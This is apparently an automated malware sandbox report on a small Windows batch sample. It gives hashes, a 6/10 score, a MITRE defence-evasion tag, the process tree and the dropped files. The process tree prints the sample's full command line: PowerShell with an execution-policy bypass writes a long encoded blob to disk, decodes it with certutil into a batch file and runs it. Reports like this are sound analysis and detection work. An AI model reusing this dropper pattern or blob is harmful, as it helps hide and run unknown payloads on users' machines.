a6b61f487434f045952421fc785441212b57f52b385a243e6be46ecf6814eb6c

General

Target

.bat
Size

5KB
MD5

2ea3cbe394afeb2832eff06e659c0f36
SHA1

f016a8202f3dc84a9a66e615e52974fd12f44ea9
SHA256

a6b61f487434f045952421fc785441212b57f52b385a243e6be46ecf6814eb6c
SHA512

74e5f57eeb50481eb62676971aaf7dba493bf0e6ab94e00caf2e1eacb6a8faf87c344dfb3e7e46bdebc41fce5ab13bb7a6fb48a5452d0f2d1e85b969d1b0f050
SSDEEP

96:0VvtGRkqqgwq0gzncJ8EQNlI1S6Lb5JZfAVJqQXGmyWEoscyWA6BYLMIoZseRW1w:yv0Hq/q0gz691S6PVfATqQXzyWFVyW+k

Score

6^/10

defense_evasion

Malware Config

Signatures

Deobfuscate/Decode Files or Information 1 TTPs 2 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
2900	powershell.exe
3056	certutil.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2900	powershell.exe
2900	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2900	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 400 wrote to memory of 2900	400	cmd.exe	83
PID 400 wrote to memory of 2900	400	cmd.exe	83
PID 2900 wrote to memory of 3056	2900	powershell.exe	84
PID 2900 wrote to memory of 3056	2900	powershell.exe	84
PID 2900 wrote to memory of 2668	2900	powershell.exe	85
PID 2900 wrote to memory of 2668	2900	powershell.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -ExecutionPolicy Bypass -Command "echo CuaMpueNrOCoje+7v+C0iuaVgOaho+KBr+aZr+C1puC0iuOoiuKAuuaVk+KBtOa9ueeJteaQoOeNqea9o+aRsuecoOaJpea9qOatr+CojeaVs+KBtOaVt+ahoua9r+O1q+eRqOeBtOOps+K8r+alpOaNs+eJr+K5pOa9o+K9reeBoeK9qeaVt+ahoua9r+eNq+OEr+OgsuOEtuOEtOOkteOQuOOQuOOks+OEuOOIseecr+ORsOSIuOWNieS5jea5teads+alieelkuWdreeJtea9ouWhkeSoueOFhuWlmeSFhOWZuuaNseatkeaNo+a5keSppuOVruWRoeWgs+aVsuShmOSFoeacseShp+WZh+S8reaVqeC1jOC0iuOoiuKAuueZheeJpea9ueaVruO8oOWQoOeVsuK9peaFhueNrOC1peeMiueRpeaUoOaVtuelsua5r+O1peeJlOaVteCojeCojeOouuSwoOeVoeaNruKBqOeRoeaMoOa1r+eVsOaVtOKBsueRs+eJoeeVtOKBsOeJlOaVteSYr+axoeaVs+CojeOouuSIoOeRpeC1oeeMiueRpeeMoOaFtOeRsueBteSYveaxoeaVs+CojeCojeOouuS0oOa5qea1qeepqeKBpeahtOKBpealt+aRruedr+aEoOKBtOeRs+eJoeeVtOC1sOeMiueRpeaYoOaxqeW9peaFruaVreKUvea5vuOBuOCojeaVs+KBtOaNs+alsueRsOaFkOahtOKUveaRvuOBsOe4peehruC0sOakiuKBpua9ruKBtOehpeeNqeKBtOKUoueBoeaRsOeRoeKVoeOBnOOEseOAruOEseeQrueRuOKAouaNpea9qOKAruKAvuaEpeeBsOaFpOaFtOWwpeOEsOK4seOEsOK4seehtOKBtOKApueRs+eJoeKBtOS0r+S5ieKUoOaNs+alsueRsOaFkOahtOKApeKApuehpeeRqeCojeaVpOKBrOSYr+KIoOaEpeeBsOaFpOaFtOWwpeOEsOK4seOEsOK4seehtOKJtOCojeCojeOouuSwoOeVoeaNruKBqOeRoeeMoOaFtOeRsueBteakoOKBpueJlOaVteCojeaVs+KBtOeRs+eJoeeVtOSZsOaxr+aVpOO1suOpg+WVnOaVs+eNsuKVnOeNteeJpeaFruaVreWwpeeBgeSRsOeRoeWxoea9kua1oea5qeWxp+aljeeJo+eNr+aZr+WxtOall+aRruedr+Wxs+eRk+eJoeKBtOaVjeeVruWBnOa9sueJp+a1oeWxs+eRk+eJoeeVtOC1sOakiuKBpueMpeaFtOeRsueBteO0peWQveeVsuKBpea9o+elsOKIoOeMpeeJo+eBqeWBtOeRoeKVqOKAouKUoueRs+eJoeeVtOSZsOaxr+aVpOKVsuC0ouC0iuOoiuKAuuaVk+KBtOeRs+aFpeKBrOSRieCojeaVs+KBtOaRqeKUveaFsuaRrua1r+C0peC0iuOoiuKAuuaVhOaVrOaVtOaEoOaxrOaYoOaxqeeNpeCojeaFo+axrOOooOaVpOaVrOaVtOaZn+axqeeNpeO4oOeVruC1rOC0iuOoiuKAuuaVh+KBtOaxo+eBqea9oueJoeC1pOeMiueRpea9rOaFo+C1rOaYiueJr+K8oOKBpuaQouaxpea1qeO1s+KAouKUpeKBqea5qeKgoOeAp+edr+eJpeahs+axpeKBrOaMrea1r+aFreaRruKIoOaVh+K1tOaxg+eBqea9oueJoeKJpOKkp+aQoOKBr+aVs+KBtOaMoualrOaJsOaFr+aRsuKUveakpeC0ouC0iuOoiuKAuuaVh+KBtOeBqeCojeaVs+axtOaNr+axoeCojea9puKBsuaYr+KIoOaVpOalrOeNreKIveKUoOakpeakoOKBruKcqOeNrua9rOatr+eBtea0oOalueK5sOeBr+a5pea5pOK5s+a9o+KBreaVsua9s+eZrOeJpeK4seeBr+a5pea5pOK5s+a9o+KBreW4sua4vuaxteW4oOKBvOalpuaRruKIoOaRgeeJpOeNpeOps+KcogrmvaTnjKDnkaXiiKDnpa3nganilL3mpKXgtKLnjIrnkaXmpKDjtbDmtKXmpbnjqbDjhb7ilLDgqI3gqI3jqLrljKDniaPmlaXnja7mvajgtbTnjIrnkaXmmKDmsanmuaXmtaHjtaXmjbPmlbLmuaXmobPnka/ngK7mna7gqI3mlbPigbTmvabmkazniaXilL3ngaHmkbDnkaHilaHgqI3mkaPilKDmvabmkazniaXgtKXngIrnna/niaXmobPmsaXigazmjK3mta/mha3mka7iiKDigKbkhbvmkaTlkK3ngbnigaXkhK3njbPmtaXmsaLkubnmtaHigaXnpZPnkbPmtaXlnK7muanmvaTnjbfkmK7nia/nja3igLvljZvnjbnmlbTiua3mpZfmka7nna/iubPmvYbmtbLiubPmlZPmka7mlYvnjbnjqZ3ljLrmuaXlnaTmpaHiobTnrKfliZDljZTntYPipKfigLvnkZPniaHitbTmsZPmlaXigbDktK3msanmpazmlbPmvaPmka7igbPjgLXjrLDikKDmtanigafigL3ljZvnjbnmlbTiua3mpZfmka7nna/iubPmvYbmtbLiubPmsYPnganmvaLniaHltaTjqLrmlYfkpbTmha3mlafipKjigLvmpKTmna3ljK7nmaHioaXilKfmpabmlazmha7mla3inKXjrKniib3gqI3gqI3jqLrknKDnkaXnkKDmtangtaXnjIrnkaXniKDmhaXnkazmtanjtaXnkKXmtanjqaXjgb7jiKzjqKXnkKXmtanjqaXjjb7jiKzjqKXnkKXmtanjqaXjmb7jiKzgtKXgtIrjqIrigLrmlYfigbTnnbDgtaTkjIrlgY/igZnilKLmvazmhaPmhazngbDmhaTmhbTlsKXmvYfmna/mlazkjZzniajmta/lsaXnjZXniaXkkKDnkaHlsaHmlYTmhabmsbXlsbTmvYzmpafiga7mhYTmhbTigKLilKLngaHmkbDnkaHilaHngK/mkbfnkK7nkbjigKLmuL7msbXgqI3gqI3gqI3jqLrljKDmuaXigaTmsaHigazmuanmvabmtbLnkaHmvannja7gqI3jqLrjuKDlgKDmuanigafnmaXniaXmvbnmla7mpKDigabnkannjKflkKDnlbLgtaXmpIrigabmlKXmlbbnpbLmua/ilaXjtL3niZTmlbXmjKDnibXigazloK3lgKDljY/igZTkoK3iiKDmvYPnka7muaXitbTnpbTmlbDigLrngaHmsbDmjannkaHmvaniva7njarmua/igKLitK3mhaTmhbTiiKDlsbvnlKLmlbPmubLmtaHlsaXjqKLlsKDkiKLnkaHmoaPnjKDmlbTmsaHniaXiiZzigKziiZzmvaPnka7muaXlsbTjqKLlsKDkgKLnmaXniaXmvbnmla7iiZzigKziiZznmaHnkaHniaHnlZ/msbLiiZzlsLrmoKLnkbTnjbDivLrmpK/mpK7mna3nibXmjK7mta/npK/klajngarkqZPngK7mna7iiZziib3ilKDmlbfmoaLmva/ilavitKDnjK3msbPmuK3ita/mlbLmvbbmlavitKDigYzkvK3juKDnla7gtazjqIrigLrigL7njZXniaXigKzngYnigKzmpbTmla3igKzmhaTmlbTigKznja/mhKDmka7mjKDmta/nlbDmlbTmubLmtaHgtaXmjIrnibXigazloK3lgKDljY/igZTkoK3iiKDmvYPnka7muaXitbTnpbTmlbDigLrngaHmsbDmjannkaHmvaniva7njarmua/igKLitK3mhaTmhbTiiKDlsbvnlKLmlbPmubLmtaHlsaXjqKLlsKDkiKLnkaHmoaPnjKDmlbTmsaHniaXiiZzigKziiZzmvaPnka7muaXlsbTjqKLlsKDmgKLmgaDnjaPmuZzkuKPnnaXmpKDmma7nia/mha3mpbTmua/mgLrmgaDmgKDmgaDnjZXniaXjtKDilKDnjbXniaXmha7mla3lsKXkpa7igbDigL3mpKXilbDmuZznja/jtKDilKDnja/lsKXkja7mta/nlbDmlbTmubLmtaHigaXigL3mjKXmta/nlbDmlbTmubLmtaHilaXmuZzmsYPnganmvaLniaHigaTigL3kjKXmpazmibDmha/mkbLlsKXnka7mtanigaXigL3ilKDmlbLmsaHmpbTmla3lsKXmka7nkaHigaXigL3mkKXnkaHilaXmuZzmkYnjtKDilKDmkanigKXmgaDlsaDisKLlsKDmhKLmhbbmhbTlvbLnibXlsazjqKLiiZznkajngbTjqbPivK/iuanmtannlafiubLmvaPiva3mobnmqYXljbDiuYrmubDlsafntKLigKLnnKXmiaXmvajmra/igKXitK3njbPitazmva7niK3nmaXmra/igaXksK3itKDigY/muL7msbXgqI3jqLrjuKDljKDmuaXigaTmjbPmlbLmuaXmobPnka/gqI3nlaPmsbLitKDigavkmK3iiKDmhbDmsbnmha/lvaTnjarmua/nrL3iiZznjbXniaXmha7mla3iiZzigLriiZzmhYLmjbTigajnkbPmhaXmlazlsbLisKLlsKDmjKLmua/mlbTnka7iiZzigLriiZzmgaDkuaDnnaXnjKDniaPmlaXiga7mvabmubXigaTilKjmkanipKXmgLrmgaDiiZziib3itKDigYbmpabmlazkgL3mhKXngbDmhaTmhbTivKXmjbPmlbLmuaXmobPnka/ngK7mna7ilKDmlbfmoaLmva/ilavitKDnjK3msbPmuK3ita/mlbLmvbbmlavitKDigYzkvK3juKDnla7gtazjqIrigLrigL7mlZPmka7mjKDniajmta/igaXniaPngbnmlbTigaTmhbDnjbPmvbfmkbLgtbPmjIrnibXigazmrK3itKDigYbngKLnpaHmvazmkaHmqZ/mvbPjta7lsbvnlKLmlbPmubLmtaHlsaXjqKLlsKDkiKLnkaHmoaPnjKDmlbTmsaHniaXiiZzigKziiZzmvaPnka7muaXlsbTjqKLlsKDmgKLmgaDmlY7igbfmoaPmvbLmla3ngKDnjaHnnbPnia/njaTmmKDnla/mka7ioKDmpKXilaTjqKnmgaDlsaDntKLigKLkmK3mmKDmsanjtaXilYDngaHmkbDnkaHilaHngK/mkbfnkK7nkbjilKDmlbfmoaLmva/ilavitKDnjK3msbPmuK3ita/mlbLmvbbmlavitKDigYzkvK3juKDnla7gtazgtIrmjIrmsaHigazmkLrmsaXnkaXlvaXmpabmlazgtbPmlIrmpbjgtbTgtIrjqIrigLrmlYTmlazmlbTmhKDmsazmmKDmsannjaXgqI3mkLrmsaXnkaXlvaXmpabmlazgtbPmkIrmsaXivKDigYbilKLngaHmkbDnkaHilaHnjZzniaPmlaXnja7mvajiubTmubDiiafjuKDnla7gtazmkIrmsaXivKDigYbilKLngaHmkbDnkaHilaHngZzmkbfnkK7nkbjigKLmuL7msbXgqI3mvafmvbTjqKDmvaUK | Out-File temp.b64; certutil -decode temp.b64 temp.bat; start temp.bat"
  2⤵
  - Deobfuscate/Decode Files or Information
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\system32\certutil.exe
    "C:\Windows\system32\certutil.exe" -decode temp.b64 temp.bat
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\temp.bat" "
    3⤵
    PID:2668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

1

T1140

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezff2a4z.f5l.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.b64

Filesize
11KB

MD5
a6e068f11647a8dd99f60130297ad5a8

SHA1
23e87d157c619606e252ffacdd3c6b68dcf26404

SHA256
3b91b167c3b91c195da2a31b16f96d37ab1c1e5b74689417ed394c3c257f90e0

SHA512
d8a268465b55cf761db6cbec2caf855c495279e77ec3c02ce8b47246ae3b2c68ea97fccafc5a3a7399feac9b1cc5018b8b1d466c1756c3c62202d973868725d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.bat

Filesize
4KB

MD5
2b9f4455c19eef318643c33af7cd4727

SHA1
aed87a93dfd28a8c8b264830bcc9b460f5825049

SHA256
04307152024985074f450ff80f809fef550c5a48ecea28f8c1c059cfc904488b

SHA512
40f6b91a08c0250a6969a684fa7766df88299a97f31c388c5bf28bc9a8ce422c63d7cdcde723af7801a8534de994c9ce1758b6f7b3b37ada9ace31bb4ec85995

Download Submit
memory/2900-0-0x00007FFDD28E3000-0x00007FFDD28E5000-memory.dmp

Filesize
8KB

Download
memory/2900-10-0x0000019E6D6B0000-0x0000019E6D6D2000-memory.dmp

Filesize
136KB

Download
memory/2900-11-0x00007FFDD28E0000-0x00007FFDD33A1000-memory.dmp

Filesize
10.8MB

Download
memory/2900-12-0x00007FFDD28E0000-0x00007FFDD33A1000-memory.dmp

Filesize
10.8MB

Download
memory/2900-19-0x00007FFDD28E0000-0x00007FFDD33A1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing